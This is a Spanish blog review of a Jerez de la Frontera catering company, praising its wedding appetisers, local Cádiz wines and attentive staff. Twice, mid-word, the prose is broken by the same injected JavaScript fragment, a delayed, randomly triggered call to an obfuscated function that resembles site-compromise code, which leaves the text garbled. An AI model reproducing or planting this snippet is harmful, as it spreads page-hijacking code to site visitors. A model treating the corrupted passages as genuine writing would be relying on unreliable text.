Davisson Catering: Tradición e innovación pueden ir de la mano

El pasado sábado tuve la oportunidad de asistir a una boda en la que la comida fue servida por éste catering de Jerez de la Frontera.

Me encanto sobre todo el momento del aperitivo, que fue realmente divertido, cada uno presentado de manera diferente, combinandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando, por ejemplo, los pinchos con la copa Martini, permitiendo de ésta manera poder mezclar sabores en un sólo bocado.

Se podía ver claramente que todos los productos eran elaborados y de calidad, nada de congelados, algo cada vez más difícil de encontrar.

En la presentación tanto de los platos principales como en la los aperitivos, es dónde pude comprobar que éste catering es fiel a la cocina tradicional pero innovandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando en su forma de presentarla.quesos

Tuve la oportunidad de conversar un rato con David, gerente del catering y me gustó mucho el que siempre intente tirar de los productos de su tierra, por ejemplo, casi todos los vinos que sirve en sus comidas son de la provincia de Cádiz, dónde además de los vinos generosos de Jerez, como el fino, oloroso, amontillado, dulce, etc. Se están produciendo unos vinos tintos de una calidad más que aceptable, como Cortijo de Jara o Garum, de Bodegas Luis Pérez.

Otra cosa a destacar, que para mí es tan importante o incluso más que la calidad de la comida, es la calidad del servicio. El personal encargado del servicio además de muy profesional, era realmente amable, atentos en todo momento a los comensales, incluso adelantándose a sus peticiones.

Un catering muy recomendable para que les sirva la comida en cualquier evento.